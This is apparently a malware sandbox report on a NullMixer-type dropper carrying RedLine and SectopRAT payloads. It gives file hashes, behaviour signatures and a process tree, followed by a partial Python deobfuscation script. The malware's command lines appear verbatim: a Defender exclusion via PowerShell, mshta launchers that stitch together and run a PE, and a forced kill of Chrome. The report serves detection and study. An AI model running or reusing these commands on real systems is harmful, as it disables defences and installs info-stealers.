| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/4692-244-0x0000000000400000-0x00000000016E0000-memory.dmp
memory/2720-243-0x0000000000400000-0x00000000016E0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/1392-257-0x0000000000400000-0x000000000054C000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 8707857582ee711842093cc40ebd451a |
| SHA1 | 4dcde0e81eba17d6658cf993d6fd56f8a461db58 |
| SHA256 | c8eef49293912eb1d6f1e607a7ccc49c291aad2eb70debc61f5570f717d03841 |
| SHA512 | 366fedb6259252cf63012abe14683b0d38aa21242fb0ba93dc4f56ca70ab7541d50ad10d833c3fc372301d425a9f45320bae88d139e89f143918c1bf0411eff0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | cf6a778de8e1362f6569d955637654ee |
| SHA1 | 3308d816553910d89028bda45c3d6ae436e1d601 |
| SHA256 | ff69f842152f9d8a0e2be272bdb68ddbeba74bc146bcbe93100b66ce00981daf |
| SHA512 | 87c962fdb3ba84548b83df7a45038977557b5e1ba1ee349886f19843fb3d7ce8a9259412fada8d01876ed005330b394c1e7d1ac39761a982d6abb8f7e0697090 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 376a191911245eeb64e68761bc781d8f |
| SHA1 | f6a1c84db673648d3fee255f538c0c31b4e71eaa |
| SHA256 | 9c39e02600ec945cc5be9fee2e81fefeeb0f229b2e66735e9d2f884c7f84ea70 |
| SHA512 | 81d5b101f779ac20b6af1f3f41534a5c972522c3368426ef882af7729d48b4ebea477626c595c6bf5f1d07c4a4a8346f48a2c0cf6bfb4064d96c7e0a78de626a |
memory/2720-284-0x0000000000400000-0x00000000016E0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 314c53681aabc2acdbff99425c085e21 |
| SHA1 | fa2a86c55810b0887f6df1db9f60bfa28a5ca4b6 |
| SHA256 | 8c6bbed2b771d5a8b95e9a1be9d2a91b53384648aec0626f0482e61dd49092af |
| SHA512 | 96b568dacf26b80d47aaa3d1c25e0054a1c8df5d25da42e499dc4c0e30475ccd7f981dc285f8b126f34016458a7dc7fa0e746b2a0e35aa67b767d9a2642d8673 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | d2bee316deb3c50f0a55de5bd4532a69 |
| SHA1 | 59bec04677e70e03f2851d1747a85ffa5d661c19 |
| SHA256 | 246d19db38389048a1bb75f013a6fc6260fec2762b0d032eb2d5294181de56f0 |
| SHA512 | 09578a4860b76c410d710b5a2e05974bda1e4bb30d98bf3668b0c518af20eb3db34b48becf89f9f91d7bc21042931ec983c47c0f1591e35a8d4644e2298f7179 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | b3b910ecd5692cdc58554830013b2a1b |
| SHA1 | c8049a5e442e43b4d001488df7d0fde67af5cf1f |
| SHA256 | 0f9451ad2b7de0421e0643efb90545916912d3717f8f85fcec70fa989ada3cbe |
| SHA512 | 51ba3972896e99a81ce5405de9c0e5e3e03337a33d5eec517d7ba3147dc4a4de1396e8951f512893c3e1138504f379ded799626e71bce5d32d42bc7b125f0e58 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | baa661f3f81fdc358d76a8a889c560ad |
| SHA1 | c76bd94b5358c1054cf20e10812d9ad4e50144b3 |
| SHA256 | 3e2a800cce3d09107ebdde5a00c20633b5bdb536e21d7a97b62b291c6f52d7f0 |
| SHA512 | 1318a7fe58a25248707130ab898e96f429cc8aee6a4a2a127f074d77c6d99eef792e8a8e97359ea0475d5d8b5dbd229934deb063c45443bfe923afa17de222c5 |
memory/1392-320-0x0000000003540000-0x00000000035D2000-memory.dmp
memory/1392-321-0x00000000035E0000-0x0000000004321000-memory.dmp
memory/1392-322-0x0000000004330000-0x00000000043BB000-memory.dmp
memory/1392-323-0x00000000043C0000-0x0000000004447000-memory.dmp
memory/2912-329-0x00000000030A0000-0x0000000003145000-memory.dmp
memory/2912-330-0x0000000003160000-0x00000000031F2000-memory.dmp
memory/2912-333-0x0000000003160000-0x00000000031F2000-memory.dmp
memory/2912-335-0x0000000000400000-0x000000000054C000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e75b9cc9c8d5d45bd5f3d9302864d086 |
| SHA1 | 602100a673f3a7760be56e5d6bda67308d7cd515 |
| SHA256 | 3870a860139cef756417825a524ca8c104c717cd9eafbfb38d76cab95905cd42 |
| SHA512 | b5ad624c3835d8f8da979f7c332ea7762234dce4178048d0f8b972d619f10f86132226e07ab215953505c9758e7c752e1375587b483b6e5335c0360b33d62314 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | fa8afef9682ae8195ad927bade96ff48 |
| SHA1 | 154c6646d60801888984e0347976e1f9bb57fdae |
| SHA256 | afadfc9bced3fc7c52f14afc31ef1900eb450c56d5961961577ecafc83b2e0cc |
| SHA512 | c390f276b58f8a7928133ce2b822005a3603b514d81bd9e4fd5c23f99924271cecf09403093b572a74435493eab8abc6d429385e67621df1b22aada71a143cb8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | d7abae24e2a4580fc7cbdbfc4da6da09 |
| SHA1 | a5ca1678925ba335076f2650bd2cd359a4c7449f |
| SHA256 | e566ec34a7e1647a5e8844dc694471ab144418a728b6acdf37ec0b410263d9c5 |
| SHA512 | e8edf54c27cfedd1a6b774fd567fa23fe467639e8bfad42f2fe3623021e9d6ec12de741be1d7f7056176d8240fbf7524e94665035edc4c5de854366f9519f0f3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4f18a5c02b3c498230fd9f67703ce3ea |
| SHA1 | f49e60b461773ad4c15690bc2515b568bbbf1102 |
| SHA256 | c7bc63889e130268efb14445b8fadd00411fb3cbb3e1332923350bc4146b1dc1 |
| SHA512 | a3076567d2e74841c3426706f38f016f09c6cd8fec2e6737eea38d44722d169556d755420d08f5118666a6d1b8aea648c9d6cf0c492cc5e9af101d2b01920afb |
C:\Users\Admin\AppData\Local\Temp\e598c77.exe
| MD5 | a014b8961283f1e07d7f31ecdd7db62f |
| SHA1 | 70714b6dc8abbaa5d1cba38c047ea3a4ec6ac065 |
| SHA256 | 21ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89 |
| SHA512 | bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869 |
memory/704-429-0x0000000000880000-0x0000000000888000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2ce12a6ff86fb598af4475d5edd76519 |
| SHA1 | c5473a4e031d48bca261f6031669872f597c62e6 |
| SHA256 | 1c8928519fe544eefd6a02e7a295607a9aceb0f1bf169e724c765dd3031b5678 |
| SHA512 | 9486687e7dd0db7c5bbdbb5db12c9b915661d8937b063299431a7f1d72fadc8bf765d73c8668d5fffa1cb0d903a5ae3802e0d56c7beeab9f9440a653dfee7213 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-22 09:57
Reported
2024-11-22 09:59
Platform
win7-20240903-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2124 set thread context of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0741b6b6c3.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07778dd9fc6d53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0741b6b6c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0752b359bd184a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07e3a022a8656c5ca.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun075246a0bffeab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07be2debb1a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0752b359bd184a.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0741b6b6c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0752b359bd184a.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07be2debb1a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07e3a022a8656c5ca.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun075246a0bffeab.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07778dd9fc6d53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07fcb30681127.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07dc9d2dae027.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0750d1e499.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0794d0eebce1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07cad998fb20a18.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0741b6b6c3.exe
Sun0741b6b6c3.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07be2debb1a.exe
Sun07be2debb1a.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun075246a0bffeab.exe
Sun075246a0bffeab.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0752b359bd184a.exe
Sun0752b359bd184a.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07fcb30681127.exe
Sun07fcb30681127.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe
Sun07cad998fb20a18.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0750d1e499.exe
Sun0750d1e499.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07e3a022a8656c5ca.exe
Sun07e3a022a8656c5ca.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe
Sun0794d0eebce1.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07778dd9fc6d53.exe
Sun07778dd9fc6d53.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07dc9d2dae027.exe
Sun07dc9d2dae027.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 236 -s 272
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sun07cad998fb20a18.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 448
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
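The two mshta.exe launchers in the process list above are case-mangled and wrapped in a VBScript WScript.Shell.Run call, so the steps they run are easier to read once the wrapper is stripped. The first one writes the two bytes MZ with echo | set /p (the usual cmd trick for writing text without a trailing newline), copy /b-appends four fragment files to it to produce R6f7sE.I, and starts that file through control.exe, which hands it to rundll32.exe Shell32.dll,Control_RunDLL as the rundll32 lines that follow show; the PE magic never sits in any fragment on disk, and the stitched file does not carry a .cpl extension. The second one copies Sun07cad998fb20a18.exe to 09xU.exE, starts the copy with its -p argument, and uses a for loop's %~nxU expansion to taskkill the original by name. The following Python is an added example, not part of the sandbox report: it recovers those steps from the two command lines as printed above (copied in as constructed input) and passes the -p argument through without interpreting it.

```python
"""Added example (not part of the sandbox report): normalize the case-mangled
mshta launchers from the process list above and recover what they run."""
import ntpath
import re
from dataclasses import dataclass, field

# Constructed input: the two mshta command lines copied from the process list.
MSHTA_ASSEMBLER = (
    r'"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN '
    r'( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 '
    r'+ gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )'
)
MSHTA_COPYRUN = (
    r'"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN '
    r'("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe"" '
    r'09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN '
    r'( ""C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe"") '
    r'do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )'
)

# WScript.Shell.Run("<command>", <window style>, <wait>); VBScript doubles quotes inside a literal.
RUN_RE = re.compile(r'\.\s*run\s*\(\s*"(.*)"\s*,\s*\d+\s*,\s*(?:true|false)\s*\)', re.I | re.S)
CMD_PREFIX_RE = re.compile(r'^\s*(?:"[^"]*\\)?cmd(?:\.exe)?"?\s+(?:/[a-z]\s+)*', re.I)
HEADER_RE = re.compile(r'echo\s*\|\s*set\s+/p\s*=\s*"?(\w+)"?\s*>\s*(\S+)', re.I)
COPY_RE = re.compile(r'copy\s+((?:/[a-z]\s+)*)(.+)$', re.I)
CONTROL_RE = re.compile(r'start\s+(?:/\S+\s+)*control(?:\.exe)?\s+(\S+)', re.I)
START_RE = re.compile(r'start\s+(?:/\S+\s+)*(\S+)\s*(.*)$', re.I)
FOR_RE = re.compile(r'for\s+%(\w)\s+in\s*\(\s*"?([^")]+?)"?\s*\)\s*do\s+(.*)$', re.I)


def inner_command(mshta_cmdline: str) -> str:
    """Return the command string that mshta hands to WScript.Shell.Run."""
    m = RUN_RE.search(mshta_cmdline)
    if not m:
        raise ValueError("no WScript.Shell.Run(...) call found")
    return m.group(1).replace('""', '"').strip()


def cmd_steps(command: str) -> list[str]:
    """Drop the cmd.exe /c|/q|/r prefix and split the chain on & and && (quoting is not honoured)."""
    body = CMD_PREFIX_RE.sub("", command, count=1)
    return [s.strip() for s in re.split(r'\s*&&?\s*', body) if s.strip()]


@dataclass
class Assembly:
    header_magic: str = ""
    header_file: str = ""
    fragments: list[str] = field(default_factory=list)
    output: str = ""
    launched: str = ""
    findings: list[str] = field(default_factory=list)


def parse_assembly(steps: list[str]) -> Assembly:
    """Recover the echo|set /p header, the copy /b fragment list and the control.exe launch."""
    a = Assembly()
    for step in steps:
        if m := HEADER_RE.search(step):
            a.header_magic, a.header_file = m.group(1), m.group(2)
        elif (m := COPY_RE.match(step)) and "/b" in m.group(1).lower():
            sources, a.output = m.group(2).rsplit(None, 1)   # last token is the destination
            a.fragments = [f.strip() for f in sources.split("+")]
        elif m := CONTROL_RE.match(step):
            a.launched = m.group(1)
    if a.header_magic.upper() == "MZ":
        a.findings.append("PE magic comes from echo|set /p, not from any fragment on disk")
    if a.fragments and a.header_file.lower() == a.fragments[0].lower():
        a.findings.append("header file is the first copy /b operand")
    if a.output and ntpath.basename(a.launched).lower() == a.output.lower():
        a.findings.append("stitched file is run via control.exe -> rundll32 Shell32.dll,Control_RunDLL")
        ext = ntpath.splitext(a.output)[1]
        if ext.lower() != ".cpl":
            a.findings.append("control.exe target has extension %r, not .cpl" % ext)
    return a


def parse_copy_run(steps: list[str]) -> dict[str, str]:
    """Recover the copy / rename / start / taskkill routine, expanding %~nxVAR."""
    info: dict[str, str] = {}
    for step in steps:
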